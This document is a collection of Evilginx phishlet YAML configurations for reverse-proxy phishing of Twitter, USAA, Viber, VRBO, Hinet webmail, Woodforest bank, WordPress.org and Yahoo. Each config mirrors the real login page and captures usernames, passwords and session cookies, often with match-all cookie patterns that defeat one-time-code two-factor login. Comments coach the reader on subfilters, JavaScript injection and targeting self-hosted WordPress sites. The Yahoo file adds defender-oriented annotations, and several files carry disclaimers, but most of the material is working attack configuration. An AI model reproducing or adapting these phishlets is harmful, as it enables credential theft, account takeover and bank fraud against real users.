'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 11 | auth_tokens: 12 | - domain: 'twitter.com' 13 | keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token'] 14 | credentials: 15 | username: 16 | key: 'session\[username_or_email\]' 17 | search: '(.*)' 18 | type: 'post' 19 | password: 20 | key: 'session\[password\]' 21 | search: '(.*)' 22 | type: 'post' 23 | login: 24 | domain: 'mobile.twitter.com' 25 
| path: '/login' 26 | -------------------------------------------------------------------------------- /phishlet_examples/twitter.yaml: -------------------------------------------------------------------------------- 1 | author: '@white_fi' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true} 5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'} 6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'} 7 | sub_filters: [] 8 | auth_tokens: 9 | - domain: '.twitter.com' 10 | keys: ['kdt','_twitter_sess','twid','auth_token'] 11 | credentials: 12 | username: 13 | key: 'session\[username_or_email\]' 14 | search: '(.*)' 15 | type: 'post' 16 | password: 17 | key: 'session\[password\]' 18 | search: '(.*)' 19 | type: 'post' 20 | login: 21 | domain: 'twitter.com' 22 | path: '/login' 23 | -------------------------------------------------------------------------------- /phishlet_examples/usaa.yaml: -------------------------------------------------------------------------------- 1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 
2 | 3 | author: '@i_am_a_Good_Human' 4 | min_ver: '2.3.0' 5 | proxy_hosts: 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'usaa.com', session: true, is_landing: true} 7 | 8 | sub_filters: 9 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | 12 | auth_tokens: 13 | - domain: '.usaa.com' 14 | keys: ['.*,regexp'] 15 | auth_urls: 16 | - '/' 17 | credentials: 18 | username: 19 | key: 'username' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'j_password' 24 | search: '(.*)' 25 | type: 'post' 26 | login: 27 | domain: 'www.usaa.com' 28 | path: '/inet/ent_logon/Logon' 29 | 30 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 
31 | 32 | -------------------------------------------------------------------------------- /phishlet_examples/viber.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'account', orig_sub: 'account', domain: 'viber.com', session: true, is_landing: true} 5 | - {phish_sub: '', orig_sub: '', domain: 'viber.com', session: true, is_landing: false} 6 | 7 | sub_filters: 8 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 9 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | - {triggers_on: 'account.viber.com', orig_sub: '', domain: 'viber.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 12 | 13 | 14 | auth_tokens: 15 | - domain: '.viber.com' 16 | keys: ['.*,regexp'] 17 | - domain: 'account.viber.com' 18 | keys: ['.*,regexp'] 19 | 20 | auth_urls: 21 | - '/account' 22 | 23 | credentials: 24 | username: 25 | key: 'phone_number' 26 | search: '(.*)' 27 | type: 'post' 28 | password: 29 | key: 'password' 30 | search: '(.*)' 31 | type: 'post' 32 | custom: 33 | - key: 'phone_prefix' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'token' 37 | search: 
'(.*)' 38 | type: 'post' 39 | 40 | force_post: 41 | - path: '/api/web/login' 42 | search: 43 | - {key: 'phone_number', search: '.*'} 44 | - {key: 'password', search: '.*'} 45 | - {key: 'token', search: '.*'} 46 | force: 47 | - {key: 'remember_me', value: 'true'} 48 | - {key: 'destination', value: ''} 49 | type: 'post' 50 | 51 | login: 52 | domain: 'account.viber.com' 53 | path: '/' 54 | -------------------------------------------------------------------------------- /phishlet_examples/vrbo.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | 4 | proxy_hosts: 5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'vrbo.com', session: true, is_landing: true, auto_filter: false} 6 | - {phish_sub: 'csvcus', orig_sub: 'csvcus', domain: 'homeaway.com', session: false, is_landing: false, auto_filter: false} 7 | - {phish_sub: 'tmcdn', orig_sub: 'tmcdn', domain: 'homeaway.com', session: true, is_landing: false, auto_filter: false} 8 | 9 | sub_filters: 10 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 11 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 12 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 13 | 14 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', 
search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 15 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 16 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 17 | 18 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 19 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 20 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 21 | 22 | auth_tokens: 23 | - domain: '.vrbo.com' 24 | keys: ['.*,regexp'] 25 | - domain: 'csvcus.homeaway.com' 26 | keys: ['.*,regexp'] 27 | - domain: '.csvcus.homeaway.com' 28 | keys: ['.*,regexp'] 29 | - domain: '.www.vrbo.com' 30 | keys: ['.*,regexp'] 31 | - domain: 
'www.vrbo.com' 32 | keys: ['.*,regexp'] 33 | - domain: 'tmcdn.homeaway.com' 34 | keys: ['.*,regexp'] 35 | 36 | auth_urls: 37 | - '/*' 38 | - '/' 39 | credentials: 40 | username: 41 | key: '' 42 | search: '"userName":"([^"]*)' 43 | type: 'json' 44 | password: 45 | key: '' 46 | search: '"secret":"([^"]*)' 47 | type: 'json' 48 | 49 | login: 50 | domain: 'www.vrbo.com' 51 | path: '/auth/ui/login?service=https%3A%2F%2Fwww.vrbo.com%2Fp%2Fhome%2Fvalidate-ticket%3Forigin%3D%252Fp%252Fhome%26site%3Dvrbo&screen=login&treatment=2fa' -------------------------------------------------------------------------------- /phishlet_examples/webhinet.yaml: -------------------------------------------------------------------------------- 1 | # LEARN TO USE --debug mode and --developer mode in evilginx. 2 | 3 | name: 'HinetWebmail' 4 | author: '@syriangeneral2' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: '', orig_sub: '', domain: 'webmail.hinet.net', session: true, is_landing: true} 8 | 9 | # TRY TO ADD MORE DOMAINS/SUBDOMAINS IF THEY ARE PRESENT DURING SITE LOADING (CHECK NETWORK TAB IN DEVELOPERS TOOLS) 10 | 11 | sub_filters: [] 12 | 13 | # LEARN TO USE SUBFILTERS (DON'T DEPEND ON AUTOFILTER BY EVILGINX) 14 | 15 | # WITHOUT SUB FILTERS SOMETIMES THE USER CAN REDIRECT TO ORIGINAL DOMAINS/SUBDOMAINS , SO USE THE SUBFILTERS CAREFULLY 16 | 17 | #CHECK THESE AIRBNB FILTERS.... 
18 | 19 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 20 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 21 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 22 | 23 | 24 | auth_tokens: 25 | - domain: 'webmail.hinet.net' #CHECK ON OFFICIAL WIKI , HOW TO USE AUTH TOKENS TO GRAB ALL NECCESAARY TOKENS. 26 | keys: ['JSESSIONID(.*),regexp'] 27 | 28 | credentials: 29 | username: 30 | key: 'mailid' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: 'password' 35 | search: '(.*)' 36 | type: 'post' 37 | # HERE YOU CAN ALSO ADD SOME CUSTOM FIELD TO CAPTURE FROM REQUESTS CHECK WIKI TO SEE HOW TO DO THAT 38 | login: 39 | domain: 'webmail.hinet.net' 40 | path: '/index.html' 41 | 42 | #LEARN TO USE JAVASCRIPT INJECTION AS WELL 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /phishlet_examples/woodforest.yaml: -------------------------------------------------------------------------------- 1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 
2 | 3 | author: '@i_am_a_Good_Human' 4 | min_ver: '2.3.0' 5 | proxy_hosts: 6 | - {phish_sub: 'online', orig_sub: 'online', domain: 'woodforest.com', session: true, is_landing: true} 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'woodforest.com', session: true, is_landing: false} 8 | - {phish_sub: '', orig_sub: '', domain: 'woodforest.com', session: true, is_landing: false} 9 | 10 | sub_filters: 11 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 12 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 
'application/json', 'application/javascript', 'application/x-javascript']} 17 | 18 | 19 | auth_tokens: 20 | - domain: '.woodforest.com' 21 | keys: ['sessionid','.*,regexp'] 22 | credentials: 23 | username: 24 | key: 'principal' 25 | search: '(.*)' 26 | type: 'post' 27 | password: 28 | key: 'password' 29 | search: '(.*)' 30 | type: 'post' 31 | login: 32 | domain: 'online.woodforest.com' 33 | path: '/login' 34 | 35 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 36 | 37 | -------------------------------------------------------------------------------- /phishlet_examples/wordpress.org.yaml: -------------------------------------------------------------------------------- 1 | # Evilginx phishlet configuration file for WordPress.org. 2 | # 3 | # This is a phishing configuration for the main WordPress.org domain, 4 | # it is *not* immediately useful for phishing self-hosted sites that 5 | # run on the WordPress software. 6 | # 7 | # For such self-hosted sites, some modifications are needed. Refer to 8 | # the comments in this file for some guidance on creating a phishlet 9 | # to use against self-hosted WordPress sites. 10 | --- 11 | name: 'WordPress.org' 12 | author: '@meitar' 13 | min_ver: '2.3.0' 14 | 15 | proxy_hosts: 16 | # Proxy the primary domain. 17 | - phish_sub: '' 18 | orig_sub: '' 19 | domain: 'wordpress.org' 20 | session: true 21 | is_landing: true 22 | 23 | # These proxied should be removed when phishing self-hosted sites. 
24 | - phish_sub: 'login' 25 | orig_sub: 'login' 26 | domain: 'wordpress.org' 27 | session: true 28 | is_landing: false 29 | - phish_sub: 'make' 30 | orig_sub: 'make' 31 | domain: 'wordpress.org' 32 | session: true 33 | is_landing: false 34 | - phish_sub: 'profiles' 35 | orig_sub: 'profiles' 36 | domain: 'wordpress.org' 37 | session: true 38 | is_landing: false 39 | 40 | sub_filters: [] 41 | 42 | # For self-hosted WordPress sites, you may find it easier to use a 43 | # regular expression to match session cookies, as the cookie names 44 | # are produced unqiely per-site. This can be done as follows: 45 | # 46 | # ```yaml 47 | # - domain: 'self-hosted-domain.com' 48 | # keys: 49 | # - 'wordpress_sec_.*,regexp' 50 | # - 'wordpress_logged_in_.*,regexp' 51 | # ``` 52 | # 53 | # If you do choose to use the regular expression facility, you 54 | # will also then need to use the `auth_urls` dictionary to define 55 | # when Evilginx should actually capture these tokens. Something 56 | # like this should do the trick: 57 | # 58 | # ```yaml 59 | # auth_urls: 60 | # - '.*/wp-admin/.*' 61 | # ``` 62 | # 63 | # The above ensures that the `auth_tokens` are noticed whenever 64 | # the phished user makes requests to URLs containing `wp-admin`. 65 | # 66 | # For the WordPress.org service itself, however, none of the above is 67 | # necessary, and the following simple `auth_tokens` dictionary should 68 | # work just fine. 
69 | auth_tokens: 70 | - domain: '.wordpress.org' 71 | keys: ['wporg_logged_in', 'wporg_sec'] 72 | 73 | credentials: 74 | username: 75 | key: 'log' 76 | search: '(.*)' 77 | type: 'post' 78 | password: 79 | key: 'pwd' 80 | search: '(.*)' 81 | type: 'post' 82 | 83 | # For a self-hosted WordPress site, you'll probably want to define the 84 | # `login` dictionary here as follows: 85 | # 86 | # ```yaml 87 | # login: 88 | # domain: 'self-hosted-domain.com' 89 | # path: '/wp-login.php' 90 | # ``` 91 | # 92 | # Some WordPress plugins, such as WooCommerce, change the URL of the 93 | # login page. You'll want to examine the specific site for this. 94 | login: 95 | domain: 'login.wordpress.org' 96 | path: '/' 97 | -------------------------------------------------------------------------------- /phishlet_examples/yahoo(fixed).yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
3 |
4 |
# Reverse-proxy phishlet definition for yahoo.com hostnames, in the format used
# by the tool this repository packages; it declares min_ver 2.3.0.
# The annotations describe what each section configures and what that means
# for detection and mitigation.
5 | author: '@an0nud4y'
6 | min_ver: '2.3.0'
# proxy_hosts: the nine yahoo.com hostnames this definition covers. Each entry
# pairs a subdomain label on the proxy's own domain (phish_sub) with the real
# one (orig_sub). The labels are identical here, so a lookalike domain that
# resolves login/mail/guce/udc/fc/ads/csp (plus www and the apex) is a usable
# hunting pattern in DNS and certificate-transparency data.
# Only 'login' has is_landing: true; session is true for www, mail, login,
# guce and udc. auto_filter is false on every entry, presumably leaving all
# hostname rewriting to the explicit sub_filters list below.
7 | proxy_hosts:
8 |   - {phish_sub: '', orig_sub: '', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
9 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
10 |   - {phish_sub: 'mail', orig_sub: 'mail', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
11 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'yahoo.com', session: true, is_landing: true, auto_filter: false}
12 |   - {phish_sub: 'guce', orig_sub: 'guce', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
13 |   - {phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
14 |   - {phish_sub: 'fc', orig_sub: 'fc', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
15 |   - {phish_sub: 'ads', orig_sub: 'ads', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
16 |   - {phish_sub: 'csp', orig_sub: 'csp', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
# sub_filters: search/replace rules for responses from the host named in
# triggers_on, limited to the listed MIME types (HTML, JavaScript, JSON).
# {domain} is a placeholder for the proxy's own domain.
# Six rules each cover responses from login, guce, fc and udc; one rule covers
# mail. References to fc, ads and csp are rewritten to login.{domain} rather
# than to their own labels.
# Defender view: a page served this way is the real site's markup with only
# hostnames swapped, so visual or content similarity does not distinguish it.
# The hostname in the address bar and in the TLS certificate does.
17 | sub_filters:
18 |   - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
19 |   - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
20 |   - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
21 |   - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
22 |   - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
23 |   - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
24 |   - {triggers_on: 'mail.yahoo.com', orig_sub: 'mail', domain: 'yahoo.com', search: 'csp.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
25 |   - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
26 |   - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
27 |   - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
28 |   - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
29 |   - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
30 |   - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
31 |   - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
32 |   - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
33 |   - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
34 |   - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
35 |   - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
36 |   - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
37 |   - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
38 |   - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
39 |   - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
40 |   - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
41 |   - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
42 |   - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
# auth_tokens: cookies to record, listed per cookie domain. The only key given
# is '.*,regexp', which reads as a match-all pattern: every cookie for
# .yahoo.com and the mail/login/guce/udc hosts rather than one named session
# cookie (TODO confirm against the tool's key syntax).
# This is the security-relevant part. What gets collected is the post-login
# session, so a one-time code typed through the proxy does not protect the
# account. The relevant controls are origin-bound authenticators
# (FIDO2/WebAuthn) and server-side checks on session reuse from a new client.
43 | auth_tokens:
44 |   - domain: '.yahoo.com'
45 |     keys: ['.*,regexp']
46 |   - domain: 'mail.yahoo.com'
47 |     keys: ['.*,regexp']
48 |   - domain: 'login.yahoo.com'
49 |     keys: ['.*,regexp']
50 |   - domain: 'guce.yahoo.com'
51 |     keys: ['.*,regexp']
52 |   - domain: 'udc.yahoo.com'
53 |     keys: ['.*,regexp']
# credentials: POST form fields recorded from the login flow. 'key' is the
# field-name pattern (the password key is anchored as '^password$'), and the
# search pattern '(.*)' keeps the whole submitted value.
# custom: additionally records the 'browser-fp-data' field. By its name this is
# a browser fingerprint blob (assumption; its contents are not shown here).
54 | credentials:
55 |   username:
56 |     key: 'username'
57 |     search: '(.*)'
58 |     type: 'post'
59 |   password:
60 |     key: '^password$'
61 |     search: '(.*)'
62 |     type: 'post'
63 |   custom:
64 |     - key: 'browser-fp-data'
65 |       search: '(.*)'
66 |       type: 'post'
# auth_urls: two path patterns, '/consent' and '/$'. Presumably a request that
# matches one of them marks the session as authenticated, which a wildcard
# cookie list cannot signal by itself (verify against the tool's docs).
67 | auth_urls:
68 |   - '/consent'
69 |   - '/$'
# login: the real entry point being mirrored. It is login.yahoo.com with the
# query parameters .src=ym, .lang=en-US, .intl=us and a URL-encoded .done
# return address of https://mail.yahoo.com/d.
70 | login:
71 |   domain: 'login.yahoo.com'
72 |   path: '/?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd'
73 |
74 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 75 | # PLEASE DO NOT MISUSE THIS PHISHLET. 76 | 77 | --------------------------------------------------------------------------------